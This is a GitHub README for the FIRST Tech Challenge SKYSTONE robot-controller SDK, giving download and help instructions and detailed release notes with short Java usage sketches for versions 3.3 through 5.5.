Ebazhanov / Linkedin Skill Assessments Quizzes: Full reference of LinkedIn answers 2024 for skill assessments (aws-lambda, rest-api, javascript, react, git, html, jquery, mongodb, java, Go, python, machine-learning, power-point), LinkedIn Excel test solutions, LinkedIn machine learning test, LinkedIn test questions and answers
beedotkiran / Lidar For AD References: A list of references on lidar point cloud processing for autonomous driving
chrisneagu / FTC Skystone Dark Angels Romania 2020

NOTICE: This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: the FtcRobotController repository.

Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer.

Getting Started
If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial. Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards.

Downloading the Project
If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository:

git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git

Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)").

Getting Help
User Documentation and Tutorials: FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation. Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system.

Javadoc Reference Material: The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation. Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: the folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps, and the folder "javadoc" contains the JavaDoc user documentation for the FTC SDK.

Online User Forum: For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum.

Release Information

Version 5.5 (20200824-090813)
Version 5.5 requires Android Studio 4.0 or later.

New features: Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161); a short sketch appears after this version's breaking changes below. Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in.
Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, or java.lang.Double will accept any block that returns a number.

Adds a telemetry API method for setting the display format: Classic, Monospace, or HTML (certain tags only). Adds Blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2). Adds new warnings which can be disabled in the Advanced RC Settings: a mismatched app versions warning, an unnecessary 2.4 GHz WiFi usage warning, and a warning when a REV Hub is running outdated firmware (older than version 1.8.2).

Adds support for the Sony PS4 gamepad, and reworks how gamepads work on the Driver Station. Removes the preference which sets gamepad type based on driver position; it is replaced with a menu which allows specifying the type for gamepads with unknown VID and PID. Attempts to auto-detect gamepad type based on USB VID and PID. If the gamepad VID and PID is not known, uses the type specified by the user for that VID and PID. If the gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad. The Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped: if only one gamepad is assigned and it drops, it can be recovered; if two gamepads are assigned with different VID/PID signatures and only one drops, it will be recovered; if two gamepads are assigned with different VID/PID signatures and BOTH drop, both will be recovered; if two gamepads are assigned with the same VID/PID signatures and only one drops, it will be recovered; if two gamepads are assigned with the same VID/PID signatures and BOTH drop, neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller.

Adds a landscape user interface to the Driver Station. New feature: practice timer with audio cues. New feature (Control Hub only): wireless network connection strength indicator (0-5 bars). New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back). The layout will NOT autorotate; you can switch the layout from the Driver Station's settings menu.

Breaking changes: Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23.
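As an illustration of the custom-Java-classes feature described above, here is a minimal sketch. The class and method names are hypothetical, while the package, the public static requirement, and the automatically supplied Telemetry parameter follow the rules listed:

```java
package org.firstinspires.ftc.teamcode; // Blocks can only call classes in this package

import org.firstinspires.ftc.robotcore.external.Telemetry;

// Hypothetical helper class; each public static method becomes callable from Blocks.
public class BlocksMath {

    // Must be public static, with no more than 21 parameters. The Telemetry argument
    // is filled in automatically by Blocks, regardless of parameter order.
    public static double clipPower(double requested, Telemetry telemetry) {
        double clipped = Math.max(-1.0, Math.min(1.0, requested));
        telemetry.addData("clipped power", clipped);
        return clipped;
    }
}
```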
Also under breaking changes, removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle().

Enhancements: Handles the RS485 address of the Control Hub automatically. The Control Hub is automatically given a reserved address. Existing configuration files will continue to work. All addresses in the range of 1-10 are still available for Expansion Hubs. The Control Hub light will now normally be solid green, without blinking to indicate the address. The Control Hub will not be shown on the Expansion Hub Address Change settings page.

Improves the REV Hub firmware updater. The user can now choose between all available firmware update files. Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability. Allows REV Hub firmware to be updated directly from the Manage webpage.

Improves the log viewer on the Robot Controller: horizontal scrolling support (no longer word wrapped), pinch-to-zoom, a monospaced font, highlighted error messages, and a new color scheme.

Attempts to force-stop a runaway/stuck OpMode without restarting the entire app. Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it.

Makes various tweaks to the Self Inspect screen: renames the "OS version" entry to "Android version"; renames "WiFi Direct Name" to "WiFi Name"; adds the Control Hub OS version, when viewing the report of a Control Hub; hides the airplane mode entry, when viewing the report of a Control Hub; removes the check for the ZTE Speed Channel Changer; shows the firmware version for all Expansion and Control Hubs.

Reworks the network settings portion of the Manage page. All network settings are now applied with a single click. The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page. WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels. The current WiFi channel is pre-selected on phone-based Robot Controllers, and on Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band.

Improves OnBotJava: new light and dark themes replace the old themes (chaos, github, chrome, ...); the new default theme is light and will be used when you first update to this version; OnBotJava now has a tabbed editor; read-only offline mode.

Improves the function of the "exit" menu item on the Robot Controller and Driver Station; the app is now guaranteed to be fully stopped and unloaded from memory. Shows a warning message if a LinearOpMode exits prematurely due to failure to monitor for the start condition. Improves the error message shown when the Driver Station and Robot Controller are incompatible with each other. The Driver Station OpMode Control Panel is now disabled while a Restart Robot is in progress. Disables advanced settings related to WiFi Direct when the Robot Controller is a Control Hub. Tints phone battery icons on the Driver Station when low/critical. Uses the names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files.

Improves I2C read performance: a very large improvement on the Control Hub, up to ~2x faster with small (e.g.
6 byte) reads; not as apparent on Expansion Hubs connected to a phone.

Updates/refreshes the build infrastructure: updates to the 'androidx' support library from 'com.android.support:appcompat', which is end-of-life; updates targetSdkVersion and compileSdkVersion to 28; updates Android Studio's Android plugin to latest; fixes the reported build timestamp in the 'About' screen. Adds a sample illustrating manual webcam use: ConceptWebcam.

Bug fixes: Fixes SkyStone issue #248. Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when the REV 2M distance sensor is unplugged. Improves readability of Toast messages on certain devices. Allows a Driver Station to connect to a Robot Controller after another has disconnected. Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number; previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming. Fixes ftc_app issue #638.

Fixes a slew of bugs with the Vuforia camera monitor, including: a bug where the preview could be displayed with a wonky aspect ratio; a bug where the preview could be cut off in landscape; a bug where the preview got totally messed up when rotating the phone; a bug where the crosshair could drift off target when using webcams.

Fixes an issue in the UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row. The issue manifested as a kernel panic on devices which do not have this kernel patch; on affected devices which do have the patch, the issue manifested simply as a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes a bug in the UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS).

Fixes an issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava. Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it. Preserves the Control Hub's network connection when "Restart Robot" is selected. Fixes an issue where device scans would fail while the Robot was restarting. Fixes RenderScript usage: uses the androidx.renderscript variant (increased compatibility) and uses RenderScript in Java mode, not native (simplifies the build). Fixes a webcam-frame-to-bitmap conversion problem: the alpha channel wasn't being initialized, only R, G, & B. Fixes a possible arithmetic overflow in Deadline. Fixes a deadlock in Vuforia webcam support which could cause 5-second delays when stopping an OpMode.

Version 5.4 (20200108-101156)
Fixes SkyStone issue #88. Adds an inspection item that notes when a Robot Controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61. Fixes SkyStone issue #142. Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs.
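As context for the voltage monitoring mentioned above, one way an OpMode can already read battery voltage is through the voltage sensors exposed in the hardware map; this is a hedged sketch of that general pattern, not the specific mechanism behind the ftc_app #417 change (the OpMode name is illustrative):

```java
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;
import com.qualcomm.robotcore.hardware.VoltageSensor;

public class BatteryCheck extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        waitForStart();
        // Report the lowest positive battery voltage seen across all hubs.
        double minVoltage = Double.POSITIVE_INFINITY;
        for (VoltageSensor sensor : hardwareMap.voltageSensor) {
            double v = sensor.getVoltage();
            if (v > 0) {
                minVoltage = Math.min(minVoltage, v);
            }
        }
        telemetry.addData("battery", "%.2f V", minVoltage);
        telemetry.update();
    }
}
```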
Fixes a crash sometimes caused by OnBotJava activity. Improves OnBotJava autosave functionality (ftc_app #738). Fixes a system responsiveness issue when an Expansion Hub is disconnected. Fixes an issue where IMU initialization could prevent Op Modes from stopping. Fixes an issue where AndroidTextToSpeech.speak() would fail if it was called too early. Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text.

Adds and improves Expansion Hub-related warnings. Improves the Expansion Hub low battery warning: displays the warning immediately after the hub reports it; specifies whether the condition is current or occurred temporarily during an OpMode run; displays which hubs reported low battery. Displays a warning when a hub loses and regains power during an OpMode run, and fixes the hub's LED pattern after this condition. Displays a warning when an Expansion Hub is not responding to commands, specifying whether the condition is current or occurred temporarily during an OpMode run. Clarifies the warning when an Expansion Hub is not present at startup, specifying that this condition requires a Robot Restart before the hub can be used; the hub light will now accurately reflect this state. Improves logging and reduces log spam during these conditions.

Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available.

Adds bulk read functionality for REV Hubs (a sketch appears below). A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following Hub bulk caching modes are available: BulkCachingMode.OFF (default): all hardware calls operate as usual; bulk data can be read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache; the cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. BulkCachingMode.MANUAL (advanced users): same as BulkCachingMode.AUTO except the cache is never cleared automatically; to avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate.

Removes the PIDF annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available, but their default control behavior will revert back to Rev 5.2. Adds a new ConceptMotorBulkRead sample OpMode to demonstrate and compare motor bulk-read modes for reducing I/O latencies.

Version 5.3 (20191004-112306)
Fixes external USB/UVC webcam support. Makes various bugfixes and improvements to the Blocks page, including but not limited to: many visual tweaks; browser zoom and window resize behave better; resizing the Java preview pane works better and more consistently across browsers; the Java preview pane consistently gets scrollbars when needed; the Java preview pane is hidden by default on phones; Internet Explorer 11 should work; large dropdown lists display properly on lower-res screens; disabled buttons are now visually identifiable as disabled; a warning is shown if a user selects a TFOD sample but their device is not compatible; warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to the Robot Configurator. Adds PIDF annotation values to AndyMark, goBILDA and TETRIX motor configurations.
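The following sketch illustrates the Version 5.4 bulk-read modes described above, using MANUAL caching with one cache clear per loop iteration; it is a hedged example, and the OpMode name is illustrative:

```java
import com.qualcomm.hardware.lynx.LynxModule;
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;
import java.util.List;

public class BulkReadSketch extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        // Set the caching mode on every hub in the configuration.
        List<LynxModule> hubs = hardwareMap.getAll(LynxModule.class);
        for (LynxModule hub : hubs) {
            hub.setBulkCachingMode(LynxModule.BulkCachingMode.MANUAL);
        }
        waitForStart();
        while (opModeIsActive()) {
            // In MANUAL mode the cache is never cleared automatically, so clear it
            // once at the top of each loop to avoid reading stale data.
            for (LynxModule hub : hubs) {
                hub.clearBulkCache();
            }
            // Subsequent reads (e.g. motor.getCurrentPosition()) are served from
            // the single bulk read performed for this iteration.
        }
    }
}
```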
These PIDF annotations have the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticeable the PIDF improvement will be.

Fixes a startup crash on Android 10. Fixes ftc_app issue #712 (thanks to FROGbots-4634). Fixes ftc_app issue #542. Allows "A" and lowercase letters when naming a device through the RC and DS apps.

Version 5.2 (20190905-083277)
Fixes extra-wide margins on settings activities, and placement of the new configuration button. Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds a TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against stuck OpModes when a Restart Robot is requested (thanks to FROGbots-4634) (ftc_app issue #709). Blocks-related changes: fixes a bug with Blocks-generated code when a hardware device name is a Java or JavaScript reserved word; shows generated Java code for Blocks, even when hardware items are missing from the active configuration; displays a warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27).

Version 5.1 (20190820-222104)
Defines default PIDF parameters for the following motors: REV Core Hex Motor, REV 20:1 HD Hex Motor, REV 40:1 HD Hex Motor. Adds a back button when running on a device without a system back button (such as a Control Hub). Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB. Fixes SkyStone issue #9. Fixes ftc_app issue #715. Prevents extra DS user clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving a new OpMode list from the RC. Adds support for the REV Color Sensor V3. Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD; no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open, as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to the RobotController resources. Added a SKYSTONE Sounds Chooser sample program.
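Returning to the PIDF control described under Version 5.3: in rough terms, PIDF extends the PID control law with a feedforward term proportional to the commanded set-point. This is a sketch of the idea, not the SDK's exact internals:

```
output = F * setPoint             // feedforward: anticipates the drive needed for the new set-point
       + P * error                // proportional to the current error
       + I * integralOfError      // accumulated past error
       + D * derivativeOfError    // rate of change of the error
```

With the F term present, the controller does not have to wait for the integral term to wind up before the motor approaches a new speed set-point.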
Version 5.1 also switches out the startup and connect chimes and the error/warning sounds for Star Wars sounds, and updates OnBot Java to use a WebSocket for communication with the robot, so the OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another.

Known issues: Camera Stream: the Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574); this problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview; for now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava: the browser back button may not always work correctly; it's possible for a build to be queued but not started (the OnBot Java build console will display a warning if this occurs); a user might not realize they are editing a different file if they inadvertently switch from one file to another, since this switch is now seamless (the name of the currently open file is displayed in the browser tab).

Version 5.0 (built on 19.06.14)
Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Displays the wifi channel in the Network circle on the Driver Station. Adds calibration for the Logitech C270. Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (required after the build tooling update). Keep-alives to mitigate the Motorola wifi scanning problem; the telemetry substitute is no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements.

Version 4.3 (built on 18.10.31)
Includes missing TensorFlow-related libraries and files.

Version 4.2 (built on 18.10.30)
Includes a fix to avoid a deadlock situation with WatchdogMonitor which could result in USB communication errors. The comm error appeared to require that the user disconnect the USB cable and restart the Robot Controller app to recover; robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:". Includes a fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. A bug in versions 4.0 and 4.1 would incorrectly list the module address of a parent REV Robotics device as "1"; if the parent module had a higher address value than the daisy-chained module, this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added a requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added the google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important note: Android Studio users will need to be connected to the Internet the first time they build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix the build issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for the REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provides examples for playing audio files in an Op Mode.
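The SDK's sound-playing samples follow roughly this pattern; treat it as a hedged sketch (the resource name is one of the Star Wars sounds mentioned under Version 5.1, and lookup by name may vary between SDK versions):

```java
import com.qualcomm.ftccommon.SoundPlayer;
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;

public class PlaySoundSketch extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        // Look up a bundled raw sound resource by name, then play it once.
        int soundId = hardwareMap.appContext.getResources().getIdentifier(
                "ss_light_saber", "raw", hardwareMap.appContext.getPackageName());
        if (soundId != 0) {
            SoundPlayer.getInstance().startPlaying(hardwareMap.appContext, soundId);
        }
        waitForStart();
    }
}
```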
Block Development Tool changes: Includes a fix for a problem with the Velocity blocks that was reported in the FTC Technology forum (Blocks Programming subforum). Changes the "Save completed successfully." message to a white color so it will contrast with a green background. Fixes the "Download image" feature so it will work if there are text blocks in the op mode. Introduces support for Google's TensorFlow Lite technology for object detection for the 2018-2019 game. TensorFlow Lite can recognize the Gold Mineral and Silver Mineral from the 2018-2019 game. Example Java and Blocks op modes are included to show how to determine the relative position of the gold block (left, center, right).

Version 4.1 (released on 18.09.24)
Changes include: Fix to prevent a crash when deprecated configuration annotations are used. Change to allow the FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for unsupported / non-legal hardware. Improvements to the Telemetry.addData block with the "text" socket. Updated the Blocks sample op mode list to include a Rover Ruckus Vuforia example. Updated the SDK library version number.

Version 4.0 (released on 18.09.12)
Changes include: Initial support for UVC compatible cameras. If a UVC camera has a unique serial number, the RC will detect and enumerate it by serial number. If a UVC camera lacks a unique serial number, the RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). The user can upload calibration files from the Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub, but it does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. The FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated the sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam.

Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. The FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). The FTC Blocks development tool was modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor.

Wireless: Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as the Samsung Galaxy S8.

Improved Expansion Hub firmware update support in the Robot Controller app. Changes to make the system more robust during the firmware update process (when performed through the Robot Controller app). The user no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If the user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect the RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy-chained through an RS485 connection.
If an Expansion Hub accidentally gets "bricked", the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. The Robot Controller app should be able to detect an Expansion Hub even if it was accidentally bricked in a previous update attempt, and should be able to install the firmware onto the Hub in that state.

Resiliency: The FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps the system recover from some ESD-induced disruptions. Various fixes to improve reliability of the FTC software.

Blocks: Fixed errors with string and list indices in Blocks export to Java. Support for USB-connected UVC webcams. Refactored and optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under the Telemetry and Miscellaneous categories) so the user can set how many decimal places to display for a numerical value. Support to play audio files (which are uploaded through the Blocks web interface) on the Driver Station in addition to the Robot Controller. Fixed a bug with the Download Image of Blocks feature. Support for the REV Robotics Blinkin LED Controller. Support for the REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure it as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware; the REV Robotics Expansion Hub supports them. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc. (a sketch appears below).

Modest improvements in logging: Decreased the frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, the user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run.

New devices: Support for the REV Robotics Blinkin LED Controller. Support for the REV Robotics 2m Distance Sensor. Added a configuration option for the REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure it as a generic digital device).

Miscellaneous: Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added the ability to play audio files on the Driver Station. When the user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets.
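Here is the DcMotorEx sketch promised above; it is a hedged example, and the motor name and velocity value are illustrative:

```java
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;
import com.qualcomm.robotcore.hardware.DcMotorEx;

public class MotorVelocitySketch extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        // Request the DcMotorEx interface; this works when the motor controller
        // (e.g. a REV Expansion Hub) supports the enhanced methods.
        DcMotorEx motor = hardwareMap.get(DcMotorEx.class, "left_drive");
        waitForStart();
        motor.setVelocity(1120);  // target velocity in encoder pulses per second
        while (opModeIsActive()) {
            telemetry.addData("velocity", motor.getVelocity());
            telemetry.update();
        }
    }
}
```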
Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous".

Known issues: Initial support for UVC compatible cameras: UVC cameras seem to draw a significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub, but it does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. The FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless: When the user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. The Tech Team is hoping to eventually address this issue in a future release. The issue has been present since the apps were introduced (i.e., it is not new with the v4.0 release). The wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous: The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. The user has to first save a newly created configuration file and then close and re-edit the file in order for the blink indicator to work.

Version 3.6 (built on 17.12.18)
Changes include: Blocks changes: Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in the Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for the setPower() method to reflect the correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames: added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method.

Version 3.5 (built on 17.10.30)
Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes an issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes an issue with the battery handler (voltage) start/stop race. Fixes an issue where Android Studio generated op modes would disappear from the available list in certain situations. Fixes a problem where OnBot Java would not build on the REV Robotics Control Hub. Fixes a problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved the error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from the android.jar binaries used by OnBot Java to reduce the final size of the Robot Controller app. Added the MR_ANALOG_TOUCH_SENSOR block to the Blocks Programming Tool.
Version 3.4 (built on 17.09.06)
Changes with version 3.4 include: Added a telemetry.update() statement to the BlankLinearOpMode template. Renamed sample Blocks op modes to be more consistent with the Java samples. Added some additional sample Blocks op modes. Reworded the OnBot Java readme slightly.

Version 3.3 (built on 17.09.04)
This version of the software includes improvements for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with version 3.3 include: The Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. The Android Studio ftc_app project is already using the gradle 3.5 distribution. The Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced with v3.2). Improvements in I2C reliability. Optimized I2C read for the REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in the Android project folder). Vuforia: Added support for VuMarks that will be used for the 2017-2018 season game. Blocks: Update to the latest Google Blockly release. Sample op modes can be selected as a template when creating a new op mode. Fixed a bug where the blocks would disappear temporarily when the mouse button is held down. Added blocks for Range.clip and Range.scale. The user can now disable/enable Blocks op modes. Fix to prevent an occasional Blocks deadlock. OnBot Java: Significant improvements to the autocomplete function of the OnBot Java editor. Sample op modes can be selected as a template when creating a new op mode. Fixes and changes to the complete hardware setup feature. Updated (and more useful) OnBot welcome message.

